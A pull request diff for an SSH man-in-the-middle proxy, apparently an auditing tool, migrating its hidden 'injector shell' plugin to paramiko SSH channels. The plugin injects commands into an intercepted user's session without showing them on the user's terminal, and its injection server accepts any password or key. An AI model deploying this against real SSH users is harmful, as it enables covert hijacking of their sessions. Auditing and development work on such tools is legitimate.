### PR TITLE
SSHInjectableForwarder migrated to SSH channels

### DIFF
--- a/ssh_proxy_server/plugins/ssh/injectorshell.py
+++ b/ssh_proxy_server/plugins/ssh/injectorshell.py
@@ -9,6 +9,9 @@ from ssh_proxy_server.forwarders.ssh import SSHForwarder
 
 
 class SSHInjectableForwarder(SSHForwarder):
+    # TODO: Upgrade to SSH
+    # TODO: Add script injection support
+    # TODO: Add stealth warning (maybe: complete stealth)
 
     @classmethod
     def parser_arguments(cls):

--- a/ssh_proxy_server/plugins/ssh/injectorshell.py
+++ b/ssh_proxy_server/plugins/ssh/injectorshell.py
@@ -5,13 +5,17 @@ import threading
 import socket
 import time
 
+import paramiko
+
 from ssh_proxy_server.forwarders.ssh import SSHForwarder
+from ssh_proxy_server.plugins.ssh.mirrorshell import InjectServer
 
 
 class SSHInjectableForwarder(SSHForwarder):
-    # TODO: Upgrade to SSH
     # TODO: Add script injection support
-    # TODO: Add stealth warning (maybe: complete stealth)
+    # TODO: complete stealth
+
+    HOST_KEY_LENGTH = 2048
 
     @classmethod
     def parser_arguments(cls):
@@ -22,44 +26,70 @@ class SSHInjectableForwarder(SSHForwarder):
             help='local address/interface where injector sessions are served'
         )
         cls.PARSER.add_argument(
-            '--ssh-injector-disable-mirror',
-            dest='ssh_injector_disable_mirror',
+            '--ssh-injector-enable-mirror',
+            dest='ssh_injector_enable_mirror',
             action="store_true",
             help='disables host session mirroring for the injector shell'
+        )
+        cls.PARSER.add_argument(
+            '--ssh-injectshell-key',
+            dest='ssh_injectshell_key'
         )
 
     def __init__(self, session):
         super(SSHInjectableForwarder, self).__init__(session)
-        self.injector_ip = self.args.ssh_injector_net
-        self.injector_port = 0
         self.injector_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         self.injector_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-        self.injector_sock.bind((self.injector_ip, self.injector_port))
+        self.injector_sock.bind((self.args.ssh_injector_net, 0))
         self.injector_sock.listen(5)
-        self.injector_running = True
+        self.inject_running = True
 
-        self.mirror_enabled = not self.args.ssh_injector_disable_mirror
+        self.mirror_enabled = self.args.ssh_injector_enable_mirror
         self.queue = queue.Queue()
         self.sender = self.session.ssh_channel
         self.injector_shells = []
-        InjectorShell.BUF_LEN = self.BUF_LEN
         thread = threading.Thread(target=self.injector_connect)
         thread.start()
         self.conn_thread = thread
-        logging.info("creating ssh injector shell %s, connect with telnet", self.injector_sock.getsockname())
 
     def injector_connect(self):
+        inject_host, inject_port = self.injector_sock.getsockname()
+        logging.info(
+            "created injector shell on port {port}. connect with: ssh -p {port} {host}".format(
+                host=inject_host,
+                port=inject_port
+            )
+        )
         try:
-            while self.injector_running:
+            while self.inject_running:
                 readable = select.select([self.injector_sock], [], [], 0.5)[0]
                 if len(readable) == 1 and readable[0] is self.injector_sock:
                     client, addr = self.injector_sock.accept()
-                    logging.info("injector shell opened from %s to ('%s', %d)", str(addr), self.injector_ip, self.injector_port)
-                    injector_shell = InjectorShell(addr, client, self)
+                    logging.info("injector shell opened from %s to ('%s', %d)", str(addr), inject_host, inject_port)
+
+                    t = paramiko.Transport(client)
+                    t.set_gss_host(socket.getfqdn(""))
+
+                    t.load_server_moduli()
+                    if self.args.ssh_injectshell_key:
+                        t.add_server_key(paramiko.RSAKey(filename=self.args.ssh_injectshell_key))
+                    else:
+                        t.add_server_key(paramiko.RSAKey.generate(bits=self.HOST_KEY_LENGTH))
+
+                    inject_server = InjectServer(self.server_channel)
+                    # TODO: Fix bug - socket breaks if original auth (with signature accept) fails
+                    event = threading.Event()
+                    t.start_server(event=event, server=inject_server)
+                    injector_channel = None
+                    while not injector_channel:
+                        injector_channel = t.accept(1)
+                    event.wait()
+
+                    injector_shell = InjectorShell(addr, injector_channel, self)
                     injector_shell.start()
                     self.injector_shells.append(injector_shell)
                 time.sleep(0.1)
-        except OSError as e:
+        except paramiko.SSHException as e:
             logging.warning("injector connection suffered an unexpected error")
             logging.exception(e)
             self.close_session(self.channel)
@@ -76,21 +106,19 @@ class SSHInjectableForwarder(SSHForwarder):
             self.sender.sendall(buf)
             if self.mirror_enabled and self.sender == self.session.ssh_channel:
                 for shell in self.injector_shells:
-                    if shell.client_sock is not self.sender:
-                        shell.client_sock.sendall(buf)
+                    if shell.client_channel is not self.sender:
+                        shell.client_channel.sendall(buf)
 
     def forward_extra(self):
         if not self.server_channel.recv_ready() and not self.session.ssh_channel.recv_ready() and not self.queue.empty():
             msg, sender = self.queue.get()
-            if msg == b'\r\n' and sender is not self.session.ssh_channel:
-                msg = b'\r'
             self.server_channel.sendall(msg)
             self.sender = sender
             self.queue.task_done()
 
     def close_session(self, channel):
-        self.injector_running = False
         super().close_session(channel)
+        self.inject_running = False
         for shell in self.injector_shells:
             shell.join()
         self.conn_thread.join()
@@ -101,31 +129,36 @@ class SSHInjectableForwarder(SSHForwarder):
 class InjectorShell(threading.Thread):
 
     BUF_LEN = 1024
+    STEALTH_WARNING = """
+    [NOTE]\r\n
+    This is a hidden shell injected into the secure session the originally host created.\r\n
+    Any commands issued CAN affect the environment of the user BUT will not be displayed on their terminal!
+    """
 
-    def __init__(self, remote, client_sock, forwarder):
+    def __init__(self, remote, client_channel, forwarder):
         super(InjectorShell, self).__init__()
         self.remote = remote
         self.forwarder = forwarder
         self.queue = self.forwarder.queue
-        self.client_sock = client_sock
+        self.client_channel = client_channel
 
     def run(self) -> None:
+        self.client_channel.sendall(self.STEALTH_WARNING)
         try:
-            while self.forwarder.injector_running:
-                readable = select.select([self.client_sock], [], [], 0.5)[0]
-                if len(readable) == 1 and readable[0] is self.client_sock:
-                    data = self.client_sock.recv(self.BUF_LEN)
-                    if data.rstrip() == b'exit' or data == b'':
+            while self.forwarder.inject_running:
+                if self.client_channel.recv_ready():
+                    data = self.client_channel.recv(self.forwarder.BUF_LEN)
+                    if data.rstrip() == b'exit' or data == b'': # TODO: individual exit
                         break
-                    self.queue.put((data, self.client_sock))
+                    self.queue.put((data, self.client_channel))
                 time.sleep(0.1)
-        except OSError:
+        except paramiko.SSHException:
             logging.warning("injector shell %s with unexpected error", str(self.remote))
         finally:
             self.terminate()
 
     def terminate(self):
-        if self.forwarder.injector_running:
+        if self.forwarder.session.running:
             self.forwarder.injector_shells.remove(self)
-        self.client_sock.close()
-        logging.warning("injector shell %s was closed", str(self.remote))
+        self.client_channel.get_transport().close()
+        logging.info("injector shell %s was closed", str(self.remote))

--- a/ssh_proxy_server/plugins/ssh/mirrorshell.py
+++ b/ssh_proxy_server/plugins/ssh/mirrorshell.py
@@ -26,7 +26,10 @@ class InjectServer(paramiko.ServerInterface):
         return paramiko.AUTH_SUCCESSFUL
 
     def get_allowed_auths(self, username):
-        return 'password'
+        return 'password, publickey'
+
+    def check_auth_publickey(self, username, key):
+        return paramiko.AUTH_SUCCESSFUL
 
     def check_channel_shell_request(self, channel):
         self.injector_channel = channel

--- a/ssh_proxy_server/plugins/ssh/mirrorshell.py
+++ b/ssh_proxy_server/plugins/ssh/mirrorshell.py
@@ -115,6 +115,7 @@ class SSHMirrorForwarder(SSHForwarder):
         super().close_session(channel)
         logging.info("closing injector connection %s", self.injector_sock.getsockname())
         self.injector_sock.close()
+        self.inject_server.injector_channel.get_transport().close()
         self.conn_thread.join()
 
     def forward_stdout(self):


### PR DESCRIPTION
- Fixed issues with MirrorForwarders termination sequence
- migrated InjectForwarder to SSH
- added Stealth Warning
- fixed connection establishment bug when declining signature
- added injector shell escape sequence

